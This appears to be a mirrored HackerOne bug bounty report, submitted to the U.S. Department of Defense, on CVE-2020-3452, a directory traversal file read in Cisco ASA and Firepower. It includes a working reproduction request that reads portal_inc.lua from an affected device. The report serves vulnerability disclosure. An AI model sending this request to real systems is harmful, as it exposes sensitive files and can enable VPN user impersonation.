Lucene search

K
hackeroneR00tdaddyH1:2233418
HistoryOct 30, 2023 - 7:36 p.m.

U.S. Dept Of Defense: Unathenticated file read (CVE-2020-3452)

2023-10-3019:36:51
r00tdaddy
hackerone.com
37
cisco
asa
ftd
unauthorized access
directory traversal
http
vulnerability
web services
software update
bug bounty

7.1 High

AI Score

Confidence

Low

0.975 High

EPSS

Percentile

100.0%

Description:
A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device.

References

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86
https://www.rapid7.com/blog/post/2020/07/23/cve-2020-3452-cisco-asa-firepower-read-only-path-traversal-vulnerability-what-you-need-to-know/

Impact

Impact
An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. As an example, this could allow an attacker to impersonate another VPN user and establish a Clientless SSL VPN or AnyConnect VPN session to the device as that user. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.

System Host(s)

โ–ˆโ–ˆโ–ˆ

Affected Product(s) and Version(s)

CVE Numbers

CVE-2020-3452

Steps to Reproduce

1.) Perform the following GET request:
GET /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=โ€ฆ&resource-type=โ€ฆ&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1
Host: โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Connection: close
Accept: /
Accept-Language: en
Accept-Encoding: gzip, deflate, br

2.) The response will contain contents of portal_inc.lua

Suggested Mitigation/Remediation Actions

Cisco has released software updates that address this vulnerability.